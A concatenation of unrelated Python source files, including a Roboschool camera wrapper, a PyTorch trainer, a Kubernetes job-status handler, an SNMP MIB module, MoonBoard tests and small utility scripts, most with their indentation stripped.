# -----------------------------------------------------------------------------
# @author:
# Tingwu Wang
# @brief:
# The environment wrapper for the depth environment of roboschool
# -----------------------------------------------------------------------------
from mbbl.config import init_path
from mbbl.env import env_util
from mbbl.env import base_env_wrapper
from mbbl.env import env_register
import numpy as np
from pyquaternion import Quaternion
class env(base_env_wrapper.base_env):
def __init__(self, env_name, rand_seed, misc_info):
super(env, self).__init__(env_name, rand_seed, misc_info)
self._base_path = init_path.get_abs_base_dir()
self._VIDEO_H = 100
self._VIDEO_W = 150
if 'video_width' in misc_info:
    self._VIDEO_W = misc_info['video_width']
if 'video_height' in misc_info:
    self._VIDEO_H = misc_info['video_height']
def step(self, action):
# get the observation
ob, reward, _, info = self._env.step(action)
info.update(self._get_rgbd_image())
# get the end signal
self._current_step += 1
info['current_step'] = self._current_step
if self._current_step >= self._env_info['max_length']:
done = True
else:
done = False
return ob, reward, done, info
def reset(self):
self._current_step = 0
self._env.env.VIDEO_H = self._VIDEO_H
self._env.env.VIDEO_W = self._VIDEO_W
return self._env.reset(), 0, False, self._get_rgbd_image()
def _build_env(self):
import gym, roboschool
self._env_info = env_register.get_env_info(self._env_name)
self._VIDEO_H, self._VIDEO_W = \
self._env_info['image_height'], self._env_info['image_width']
roboschool_env_name = self._env_name.split('-')
roboschool_env_name = \
roboschool_env_name[0] + '-' + roboschool_env_name[1]
self._env = gym.make(roboschool_env_name)
def _get_rgbd_image(self):
image_info = {}
if self._env_info['depth']:
self._camera_adjust()
rgb, depth, depth_mask, _, _ = \
self._env.env.camera.render(True, False, False)
rendered_rgb = np.frombuffer(rgb, dtype=np.uint8).reshape(
(self._VIDEO_H, self._VIDEO_W, 3)
)
rendered_depth = np.frombuffer(depth, dtype=np.float32).reshape(
(int(self._VIDEO_H / 2), int(self._VIDEO_W / 2))
)
image_info['depth'] = rendered_depth
image_info['rgb'] = rendered_rgb
elif self._env_info['rgb']:
self._camera_adjust()
rgb, _, _, _, _ = self._env.env.camera.render(False, False, False)
rendered_rgb = np.frombuffer(rgb, dtype=np.uint8).reshape(
(self._VIDEO_H, self._VIDEO_W, 3)
)
image_info['rgb'] = rendered_rgb
return image_info
def _camera_adjust(self):
if 'RoboschoolHumanoid' in self._env_name:
camera = self._env.env.camera
'''
root_quat = self._env.env.robot_body.pose().quatertion()
rotation = Quaternion(root_quat[0], root_quat[1],
root_quat[2], root_quat[3]).rotation_matrix
'''
root_xyz = self._env.env.robot_body.pose().xyz()
# (-1, 0, 0) for the running direction (1, 0, 0)
# (0, 1, 0) --> (0, 1, 0)
# (0, 0, 1) --> (0, 0, 1)
camera_location = root_xyz + \
np.array([0, 0, 0.20]) + np.array([0.4, 0, 0])
look_at_vec = np.array([0.4, 0, -1]) + camera_location
self._env.env.camera_adjust()
camera.set_hfov(100.0)
camera.move_and_look_at(
camera_location[0], camera_location[1], camera_location[2],
look_at_vec[0], look_at_vec[1], look_at_vec[2]
)
elif 'RoboschoolAnt' in self._env_name:
camera = self._env.env.camera
root_quat = self._env.env.robot_body.pose().quatertion()
root_xyz = self._env.env.robot_body.pose().xyz()
# (-1, 0, 0) for the running direction (1, 0, 0)
# (0, 1, 0) --> (0, 1, 0)
# (0, 0, 1) --> (0, 0, 1)
camera_location = root_xyz + \
np.array([-1, 0, 1])
look_at_vec = root_xyz
self._env.env.camera_adjust()
camera.move_and_look_at(
camera_location[0], camera_location[1], camera_location[2],
look_at_vec[0], look_at_vec[1], look_at_vec[2]
)
else:
self._env.env.camera_adjust()
if __name__ == '__main__':
# test the function
import matplotlib.pyplot as plt
test_type = 'rgb'
test_type = 'depth'
if test_type == 'rgb':
test_env = env('RoboschoolHumanoidFlagrunHarder-v1-rgb', 1234, {})
ob, reward, done, info = test_env.reset()
for _ in range(100):
plt.imshow(info['rgb'])
plt.show()
ob, reward, done, info = test_env.step(np.random.randn(17))
# import pdb; pdb.set_trace()
elif test_type == 'depth':
# test_env = env('RoboschoolHumanoidFlagrunHarder-v1-rgbd', 1234, {})
test_env = env('RoboschoolHumanoid-v1-rgbd', 1234, {})
# test_env = env('RoboschoolAnt-v1-rgbd', 1234, {})
ob, reward, done, info = test_env.reset()
for _ in range(100):
plt.imshow(info['depth'], cmap='gray', vmin=-1, vmax=1.0)
print(info['depth'])
plt.show()
ob, reward, done, info = test_env.step(np.random.randn(17))
|
import numpy as np
import utils_driving as utils
import theano as th
import theano.tensor as tt
from trajectory import Trajectory
import feature
class Car(object):
def __init__(self, dyn, x0, color='yellow', T=5):
self.data0 = {'x0': x0}
self.bounds = [(-1., 1.), (-1., 1.)]
self.T = T
self.dyn = dyn
self.traj = Trajectory(T, dyn)
self.traj.x0.set_value(x0)
self.linear = Trajectory(T, dyn)
self.linear.x0.set_value(x0)
self.color = color
self.default_u = np.zeros(self.dyn.nu)
def reset(self):
self.traj.x0.set_value(self.data0['x0'])
self.linear.x0.set_value(self.data0['x0'])
for t in range(self.T):
self.traj.u[t].set_value(np.zeros(self.dyn.nu))
self.linear.u[t].set_value(self.default_u)
def move(self):
self.traj.tick()
self.linear.x0.set_value(self.traj.x0.get_value())
@property
def x(self):
return self.traj.x0.get_value()
@x.setter
def x(self, value):
self.traj.x0.set_value(value)
@property
def u(self):
return self.traj.u[0].get_value()
@u.setter
def u(self, value):
self.traj.u[0].set_value(value)
def control(self, steer, gas):
pass
|
from django.contrib import admin
from .models import Event, Contact, EventImage
# Register your models here.
class EventImageInline(admin.TabularInline):
model = EventImage
extra = 3
class EventAdmin(admin.ModelAdmin):
inlines = [ EventImageInline, ]
admin.site.register(Event, EventAdmin)
admin.site.register(Contact)
admin.site.site_header = "Elea Africa Backend"
|
"""Trainer Class"""
from pathlib import Path
from tqdm import tqdm
import torch
import torch.nn as nn
from tensorboardX import SummaryWriter
from utils.logger import get_logger
LOG = get_logger(__name__)
class Trainer:
def __init__(self, **kwargs):
self.device = kwargs['device']
self.model = kwargs['model']
self.trainloader, self.testloader = kwargs['dataloaders']
self.epochs = kwargs['epochs']
self.optimizer = kwargs['optimizer']
self.criterion = kwargs['criterion']
self.metric = kwargs['metrics']
self.save_ckpt_interval = kwargs['save_ckpt_interval']
self.ckpt_dir = kwargs['ckpt_dir']
self.writer = SummaryWriter(str(kwargs['summary_dir']))
def train(self):
best_acc = 0.0
for epoch in range(self.epochs):
LOG.info(f'\n==================== Epoch: {epoch} ====================')
LOG.info('\n Train:')
self.model.train()
with tqdm(self.trainloader, ncols=100) as pbar:
for idx, (inputs, targets) in enumerate(pbar):
inputs = inputs.to(self.device)
targets = targets.to(self.device)
outputs = self.model(inputs)
loss = self.criterion(outputs, targets)
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
preds = outputs.argmax(axis=1)
self.metric.update(preds=preds.cpu().detach().clone(),
targets=targets.cpu().detach().clone(),
loss=loss.item())
pbar.set_description(f'train epoch:{epoch}')
self.metric.result(epoch, mode='train')
self._write_summary(epoch, mode='train')
self.metric.reset_states()
# eval
eval_acc = self.eval(epoch)
# save ckpt
if epoch != 0 and epoch % self.save_ckpt_interval == 0:
LOG.info(' Saving Checkpoint...')
self._save_ckpt(epoch)
# save best ckpt
if eval_acc > best_acc:
best_acc = eval_acc
self._save_ckpt(epoch, mode='best')
def eval(self, epoch: int = 0) -> float:
self.model.eval()
LOG.info('\n Evaluation:')
with torch.no_grad():
with tqdm(self.testloader, ncols=100) as pbar:
for idx, (inputs, targets) in enumerate(pbar):
inputs = inputs.to(self.device)
targets = targets.to(self.device)
outputs = self.model(inputs)
loss = self.criterion(outputs, targets)
self.optimizer.zero_grad()
preds = outputs.argmax(axis=1)
self.metric.update(preds=preds.cpu().detach().clone(),
targets=targets.cpu().detach().clone(),
loss=loss.item())
pbar.set_description(f'eval epoch: {epoch}')
self.metric.result(epoch, mode='eval')
self._write_summary(epoch, mode='eval')
eval_acc = self.metric.acc
self.metric.reset_states()
return eval_acc
def _write_summary(self, epoch: int, mode: str):
# Rename 'eval' to 'val' so TensorBoard orders the tags as train, then val (left to right).
mode = 'val' if mode == 'eval' else mode
self.writer.add_scalar(f'loss/{mode}', self.metric.loss, epoch)
self.writer.add_scalar(f'accuracy/{mode}', self.metric.acc, epoch)
self.writer.add_scalar(f'mean_f1score/{mode}', self.metric.f1score.mean(), epoch)
self.writer.add_scalar(f'precision/{mode}', self.metric.precision.mean(), epoch)
self.writer.add_scalar(f'recall/{mode}', self.metric.recall.mean(), epoch)
def _save_ckpt(self, epoch, mode=None, zfill=4):
if isinstance(self.model, nn.DataParallel):
model = self.model.module
else:
model = self.model
if mode == 'best':
ckpt_path = self.ckpt_dir / 'best_acc_ckpt.pth'
else:
ckpt_path = self.ckpt_dir / f'epoch{str(epoch).zfill(zfill)}_ckpt.pth'
torch.save({
'epoch': epoch,
'model': model,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
}, ckpt_path)
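# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original trainer module). It wires the
# Trainer to a toy linear model; DummyMetric is a stand-in that implements only
# the interface Trainer actually calls (update / result / reset_states plus the
# loss / acc / f1score / precision / recall attributes read by _write_summary).
# It assumes the project's utils.logger module and tensorboardX are importable,
# as they already are at the top of this file; the real project presumably
# supplies its own metrics object.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    import numpy as np
    from torch.utils.data import DataLoader, TensorDataset

    class DummyMetric:
        def __init__(self, n_classes=2):
            self.n_classes = n_classes
            self.reset_states()

        def update(self, preds, targets, loss):
            self._correct += (preds == targets).sum().item()
            self._total += len(targets)
            self._loss_sum += loss
            self._batches += 1

        def result(self, epoch, mode='train'):
            self.loss = self._loss_sum / max(self._batches, 1)
            self.acc = self._correct / max(self._total, 1)
            # Per-class scores are stubbed out; only their .mean() is used.
            self.f1score = np.zeros(self.n_classes)
            self.precision = np.zeros(self.n_classes)
            self.recall = np.zeros(self.n_classes)

        def reset_states(self):
            self._correct, self._total = 0, 0
            self._loss_sum, self._batches = 0.0, 0

    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    x = torch.randn(64, 10)
    y = (x.sum(dim=1) > 0).long()
    loader = DataLoader(TensorDataset(x, y), batch_size=16)
    model = nn.Linear(10, 2).to(device)
    ckpt_dir = Path('/tmp/ckpts')
    ckpt_dir.mkdir(parents=True, exist_ok=True)
    trainer = Trainer(
        device=device,
        model=model,
        dataloaders=(loader, loader),  # same toy loader for train and test
        epochs=2,
        optimizer=torch.optim.SGD(model.parameters(), lr=0.1),
        criterion=nn.CrossEntropyLoss(),
        metrics=DummyMetric(),
        save_ckpt_interval=1,
        ckpt_dir=ckpt_dir,
        summary_dir='/tmp/summaries',
    )
    trainer.train()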
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import google
from google.cloud import container_v1
import google.auth
import google.auth.transport.requests
import kubernetes
from tempfile import NamedTemporaryFile
import time
import util
DOES_NOT_EXIST = 'does_not_exist'
UNKNOWN_STATUS = 'unknown'
SUCCESS = 'success'
FAILURE = 'failure'
TIMEOUT = 'timeout'
class JobStatusHandler(object):
def __init__(self, project_id, zone, cluster_name, logger):
"""Query Kubernetes API to retrieve the status of Kubernetes Jobs.
Args:
project_id (string): Name of the Cloud project under which the
Kubernetes Job(s) ran.
zone (string): Zone where the Kubernetes Job(s) ran.
cluster_name (string): Name of the Kubernetes cluster where the
Job(s) ran. Corresponds to the `cluster-name` attribute in GCP.
logger (`AlertHandler` instance): Used to write logs and alert emails.
Raises:
Exception if unable to initialize the Kubernetes client.
"""
self.project_id = project_id
self.zone = zone
self.cluster_name = cluster_name
self.logger = logger
self.k8s_client = None
self.location = None
def _init_k8s_client(self):
# Attempt to initialize a Kubernetes client to retrieve Job statuses.
# Different methods are used depending on where this code runs.
try:
# This method is used when there is no local kubeconfig file, e.g.
# running this code within a Cloud Function. For local runs, you can
# use this path by running `gcloud auth application-default login`.
self.logger.info('Attempting to init k8s client from cluster response.')
container_client = container_v1.ClusterManagerClient()
# Try zonal cluster first, then try regional.
try:
cluster_path = "projects/{}/locations/{}/clusters/{}".format(
self.project_id, self.zone, self.cluster_name)
response = container_client.get_cluster(
None, None, None, name=cluster_path)
self.location = self.zone
except google.api_core.exceptions.NotFound:
self.logger.warning('No zonal cluster found for {}. Trying regional.'.format(cluster_path))
# TODO: include this in message instead
region = self.zone[:-2]
cluster_path = "projects/{}/locations/{}/clusters/{}".format(
self.project_id, region, self.cluster_name)
response = container_client.get_cluster(
None, None, None, name=cluster_path)
self.location = region
creds, projects = google.auth.default()
auth_req = google.auth.transport.requests.Request()
creds.refresh(auth_req)
configuration = kubernetes.client.Configuration()
configuration.host = f'https://{response.endpoint}'
with NamedTemporaryFile(delete=False) as ca_cert:
ca_cert.write(
base64.b64decode(response.master_auth.cluster_ca_certificate))
configuration.ssl_ca_cert = ca_cert.name
configuration.api_key_prefix['authorization'] = 'Bearer'
configuration.api_key['authorization'] = creds.token
self.k8s_client = kubernetes.client.BatchV1Api(
kubernetes.client.ApiClient(configuration))
self.logger.info('Successful init of k8s client from cluster response.')
except Exception as e1:
# This method is generally used for local runs where the user has already
# ran `gcloud container clusters get-credentials` to get a kubeconfig.
self.logger.warning(
'Failed to load k8s client from cluster response: {}. '
'Falling back to local kubeconfig file.'.format(e1))
try:
kubernetes.config.load_kube_config()
self.k8s_client = kubernetes.client.BatchV1Api()
self.logger.info(
'Successful init of k8s client from local kubeconfig file.')
except Exception as e2:
self.logger.fatal(
'Failed both methods of loading k8s client. Error for '
'cluster response method: {}. Error for local '
'kubeconfig file: {}. No job status will be '
'collected.'.format(e1, e2))
raise
def _query_for_status(self, job_name, namespace):
if not self.k8s_client:
self._init_k8s_client()
try:
status = self.k8s_client.read_namespaced_job(
job_name, namespace).status
except Exception as e:
if isinstance(e, kubernetes.client.rest.ApiException) and \
e.status == 404:
self.logger.warning(
'Job with job_name: {} no longer exists in namespace: '
'{}. Error was: {}'.format(job_name, namespace, e))
return DOES_NOT_EXIST, None
else:
self.logger.error(
'Failed to get job status for job_name: {} and '
'namespace: {}. Error was: {}'.format(
job_name, namespace, e))
return FAILURE, None
return SUCCESS, status
def workload_link(self, job_name, job_namespace):
"""Build a link to the Kubernetes workload for a specific test run.
Args:
job_name (string): Name of the Kubernetes job. Should include the
timestamp, e.g. 'pt-1.5-resnet-func-v3-8-1584453600'.
job_namespace (string): Name of the Kubernetes namespace.
Returns:
link (string): A link to the Kubernetes workload page for this job.
"""
if not self.location:
self._init_k8s_client()
return util.workload_link(
job_name, job_namespace, self.location, self.cluster_name, self.project_id)
def interpret_status(self, status, job_name):
"""Interprets the status of a Kubernetes job.
Args:
status (Status): Return value of e.g. `read_namespaced_job_status`.
job_name (string): Name of the job to use in logging.
Returns:
completion_code (string): State that the Job ended in.
stop_time (timestamp): Time at which the Job completed or fully failed.
num_failures (int): Number of unsuccessful attempts of this Job.
"""
self.logger.info('job_name: {}. status: {}'.format(job_name, status))
if status.active:
self.logger.warning('Job is still active. Returning UNKNOWN_STATUS.')
return UNKNOWN_STATUS, None, None
completion_code = UNKNOWN_STATUS
if status.succeeded:
completion_code = SUCCESS
if status.completion_time:
stop_time = status.completion_time.timestamp()
else:
if status.conditions and len(status.conditions) == 1 and \
status.conditions[0].last_transition_time:
stop_time = status.conditions[0].last_transition_time.timestamp()
self.logger.error(
'No completion_time in success status for job: {}. Using '
'last_transition_time. Status: {}'.format(job_name, status))
else:
self.logger.error(
'No completion_time or transition time in success status for '
'job: {}. Using time.time(). Status: {}'.format(job_name, status))
stop_time = time.time()
else:
if not status.conditions or len(status.conditions) != 1:
self.logger.warning(
'Expected exactly 1 `condition` element in non-success status. '
'Will retry later. Status was: {}.'.format(status))
completion_code = DOES_NOT_EXIST
stop_time = time.time()
else:
completion_code = TIMEOUT if \
status.conditions[0].reason == 'DeadlineExceeded' else FAILURE
stop_time = status.conditions[0].last_transition_time.timestamp()
num_failures = status.failed or 0
return completion_code, stop_time, num_failures
def get_job_status(self, job_name, namespace):
"""Returns key information about the status of a Kubernetes Job.
Args:
job_name (string): Name of the job.
namespace (string): Name of the Kubernetes namespace where the job ran.
Returns:
completion_code (string): The current status of the Job.
stop_time (timestamp): Time at which the Job completed or fully failed.
num_failures (int): Number of unsuccessful attempts of this Job.
"""
retrieval_status, status = self._query_for_status(job_name, namespace)
if retrieval_status == DOES_NOT_EXIST:
return DOES_NOT_EXIST, None, None
elif retrieval_status == FAILURE:
return UNKNOWN_STATUS, None, None
completion_code, stop_time, num_failures = self.interpret_status(
status, job_name)
return completion_code, stop_time, num_failures
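# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The project,
# zone, cluster, and namespace identifiers below are placeholders; a real run
# needs GCP credentials and must be executed where the local `util` module
# resolves. A plain logging.Logger stands in for the AlertHandler described in
# the class docstring.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    import logging
    logging.basicConfig(level=logging.INFO)
    handler = JobStatusHandler(
        project_id='my-gcp-project',      # placeholder
        zone='us-central1-b',             # placeholder
        cluster_name='my-test-cluster',   # placeholder
        logger=logging.getLogger(__name__))
    completion_code, stop_time, num_failures = handler.get_job_status(
        'pt-1.5-resnet-func-v3-8-1584453600',  # example job name from the docstring
        'default')
    print(completion_code, stop_time, num_failures)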
|
'''
***********************************************************************************************************************
* Main process file solar estimation tool *
* Created by P.Nezval *
* version 0.1 *
* May 2021 - August 2021 *
***********************************************************************************************************************
License:
MIT License
==================================
'''
from det_tool.process import main
######################################################################################################################
if __name__ == "__main__":
main()
|
from os.path import isfile
import unittest
from moonboard import MoonBoard, get_moonboard
# class BaseAPITestClass(unittest.TestCase):
# """
# BaseClass for testing
# """
# def setUp(self):
# """
# Set up method that will run before every test
# """
# pass
# def tearDown(self):
# """
# Tear down method that will run after every test
# """
# pass
class MoonboardTests(unittest.TestCase):
def test_equal_moonboards(self):
"""
Test that two MoonBoard objects with the same parameters are equal
"""
# Given
year = 2017
# When
m1 = get_moonboard(year)
m2 = get_moonboard(year)
# Then
self.assertEqual(m1, m2)
def test_get_valid_moonboard(self):
"""
Test that a valid moon year returns a MoonBoard object
"""
# Given
year = [2016, 2017, 2019] # Valid moon year layouts
# When
moonboards = [get_moonboard(y) for y in year]
# Then
self.assertTrue(all([isinstance(mb, MoonBoard) for mb in moonboards]))
self.assertTrue(
all([mb.get_year_layout() in year for mb in moonboards]))
self.assertTrue(all([mb.get_cols() == 11 for mb in moonboards]))
self.assertTrue(all([mb.get_rows() == 18 for mb in moonboards]))
self.assertTrue(all([isfile(mb.get_image()) for mb in moonboards]))
def test_get_invalid_moonboard(self):
"""
Test that an invalid moon year raises an error
"""
# Given
year = 2015 # Invalid moon year layout
# When
with self.assertRaises(ValueError) as context:
get_moonboard(year)
# Then
self.assertTrue(
'Invalid year' in str(context.exception)
) # Test error message?
self.assertRaises(ValueError, get_moonboard, year)
class GeneratorsTests(unittest.TestCase):
def test_empty_generator(self):
"""
Test that an empty generator raises a NotImplementedError when
generate() is called
"""
# Given
from generators.base_generator import BaseGenerator
# When
class EmptyGen(BaseGenerator):
pass
gen = EmptyGen()
# Then
with self.assertRaises(NotImplementedError) as context:
gen.generate()
def test_ahoughton_generator(self):
"""
Test that the Ahoughton generator returns a valid MoonBoard problem
"""
# Given
from generators.ahoughton import AhoughtonGenerator
a_gen = AhoughtonGenerator()
# When
problem = a_gen.generate()
# Then
self.assertTrue('18' in problem[0]) # assert climb ends at top row
# assert climb starts at bottom rows
self.assertTrue(problem[-1][-1] in '6543') # This fails sometimes
self.assertTrue(len(problem) > 2) # assert there are more than 2 moves
if __name__ == '__main__':
unittest.main()
|
import logging
import concurrent.futures
from EOSS.critic.critic import Critic
from EOSS.models import EOSSContext
logger = logging.getLogger('EOSS.critic')
def general_call(design_id, designs, session_key, context):
eosscontext = EOSSContext.objects.get(id=context["screen"]["id"])
critic = Critic(eosscontext.user_information, session_key)
# print("Critizing arch ", design_id,"in",designs)
try:
this_design = find_design_by_id(designs, design_id)
if this_design is None:
raise ValueError("Design id {} not found in the database".format(design_id))
critic_results = []
with concurrent.futures.ThreadPoolExecutor() as executor:
# Criticize architecture (based on rules)
expert_results = executor.submit(critic.expert_critic, this_design)
# Criticize architecture (based on explorer)
explorer_results = executor.submit(critic.explorer_critic, this_design)
# Criticize architecture (based on database)
# TODO: Fix issues with new Database system matching the inputs to historian (NLP work)
# historian_results = executor.submit(critic.historian_critic, this_design)
# Criticize architecture (based on data mining)
analyst_results = executor.submit(critic.analyst_critic, this_design)
critic_results.extend(expert_results.result())
critic_results.extend(explorer_results.result())
#critic_results.extend(historian_results.result())
critic_results.extend(analyst_results.result())
# Send response
return critic_results
except Exception:
logger.exception('Exception in criticizing the architecture')
return None
def find_design_by_id(design_set, design_id):
for design in design_set:
if design["id"] == design_id:
return design
def specific_call(design_id, agent, designs, session_key, context):
eosscontext = EOSSContext.objects.get(id=context["screen"]["id"])
critic = Critic(eosscontext, session_key)
try:
result = []
result_arr = []
this_design = designs.get(id=design_id)
if this_design is None:
raise ValueError("Design id {} not found in the database".format(design_id))
if agent == 'expert':
# Criticize architecture (based on rules)
result_arr = critic.expert_critic(this_design)
elif agent == 'historian':
# Criticize architecture (based on database)
result_arr = critic.historian_critic(this_design)
elif agent == 'analyst':
# Criticize architecture (based on data mining)
result_arr = critic.analyst_critic(this_design)
elif agent == 'explorer':
# Criticize architecture (based on explorer)
result_arr = critic.explorer_critic(this_design)
# Send response
return result_arr
except Exception:
logger.exception('Exception in using a single agent to criticize the architecture')
return None
|
#
# PySNMP MIB module CXACTE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CXACTE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:16:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
cxACTE, = mibBuilder.importSymbols("CXProduct-SMI", "cxACTE")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Gauge32, Counter64, IpAddress, MibIdentifier, ModuleIdentity, iso, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, Bits, Integer32, Unsigned32, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "Counter64", "IpAddress", "MibIdentifier", "ModuleIdentity", "iso", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "Bits", "Integer32", "Unsigned32", "Counter32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
acteDebugTable = MibTable((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30), )
if mibBuilder.loadTexts: acteDebugTable.setStatus('mandatory')
acteDebugEntry = MibTableRow((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1), ).setIndexNames((0, "CXACTE-MIB", "acteDebugLinkIndex"), (0, "CXACTE-MIB", "acteDebugIndex"))
if mibBuilder.loadTexts: acteDebugEntry.setStatus('mandatory')
acteDebugLinkIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2))).setMaxAccess("readonly")
if mibBuilder.loadTexts: acteDebugLinkIndex.setStatus('mandatory')
acteDebugIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 31))).setMaxAccess("readonly")
if mibBuilder.loadTexts: acteDebugIndex.setStatus('mandatory')
acteDebugRegister = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 5))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: acteDebugRegister.setStatus('mandatory')
acteDebugResult = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 50), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 25))).setMaxAccess("readonly")
if mibBuilder.loadTexts: acteDebugResult.setStatus('mandatory')
acteDebugWrite = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 80), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 2))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugWrite.setStatus('mandatory')
acteDebugTvdStat = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 81), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugTvdStat.setStatus('mandatory')
acteDebugDs1Stat = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 82), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugDs1Stat.setStatus('mandatory')
acteDebugSvdStat = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 83), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugSvdStat.setStatus('mandatory')
acteDebugSvdEvt = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 84), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugSvdEvt.setStatus('mandatory')
mibBuilder.exportSymbols("CXACTE-MIB", acteDebugDs1Stat=acteDebugDs1Stat, acteDebugLinkIndex=acteDebugLinkIndex, acteDebugIndex=acteDebugIndex, acteDebugSvdStat=acteDebugSvdStat, acteDebugWrite=acteDebugWrite, acteDebugRegister=acteDebugRegister, acteDebugResult=acteDebugResult, acteDebugTvdStat=acteDebugTvdStat, acteDebugTable=acteDebugTable, acteDebugEntry=acteDebugEntry, acteDebugSvdEvt=acteDebugSvdEvt)
|
def extractWwwSigmanovelCom(item):
'''
Parser for 'www.sigmanovel.com'
'''
if 'Teasers' in item['tags']:
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('Martial God Conquerer', 'Martial God Conquerer', 'translated'),
('World Controlling God', 'World Controlling God', 'translated'),
('Above The Skies', 'Above The Skies', 'translated'),
('Sage Emperor', 'Sage Emperor', 'translated'),
('The Mysterious Apartment', 'The Mysterious Apartment', 'translated'),
('Rebirth in a Perfect Era', 'Rebirth in a Perfect Era', 'translated'),
('Immortal', 'Immortal', 'translated'),
('Great Tyrannical Deity', 'Great Tyrannical Deity', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
#!/usr/bin/env python
"""igcollect - Redis Keys
Copyright (c) 2017 InnoGames GmbH
"""
import redis
from argparse import ArgumentParser
from subprocess import Popen, PIPE
from time import time
def parse_args():
parser = ArgumentParser()
parser.add_argument('--prefix', default='redis')
parser.add_argument('--redis_host', default='localhost')
parser.add_argument('--redis_port', default='6379')
parser.add_argument('--command', default='llen')
parser.add_argument('--keys', default='*queue*')
return parser.parse_args()
def main():
args = parse_args()
template = args.prefix + '.{}.{} {} ' + str(int(time()))
redis_db = redis.StrictRedis(
host=args.redis_host, port=args.redis_port, db=0)
for key in redis_db.keys(args.keys):
data = redis_db.execute_command(args.command, key)
print(template.format(key, args.command, data))
if __name__ == '__main__':
main()
|
from __future__ import print_function
from burlap import Satchel
from burlap.constants import *
from burlap.decorators import task
#http://askubuntu.com/a/555366/13217
class VirtualboxSatchel(Satchel):
name = 'virtualbox'
@task(precursors=['packager'])
def configure(self):
"""
Enables the repository for a most current version on Debian systems.
https://www.rabbitmq.com/install-debian.html
"""
os_version = self.os_version
if not self.dryrun and os_version.distro != UBUNTU:
raise NotImplementedError("OS %s is not supported." % os_version)
r = self.local_renderer
r.env.codename = (r.run('lsb_release -c -s') or "`lsb_release -c -s`").strip()
r.sudo('apt-add-repository "deb http://download.virtualbox.org/virtualbox/debian {codename} contrib"')
r.sudo('cd /tmp; wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -')
r.sudo('apt-get update')
virtualbox = VirtualboxSatchel()
|
import os
import signal
class SignalHandler(object):
"""Class to detect OS signals
e.g. detect when CTRL+C is pressed and issue a callback
"""
def __init__(self, sig=signal.SIGINT, callback=None, resignal_on_exit=False):
self.sig = sig
self.interrupted = False
self.released = False
self.original_handler = None
self.resignal_on_exit = resignal_on_exit
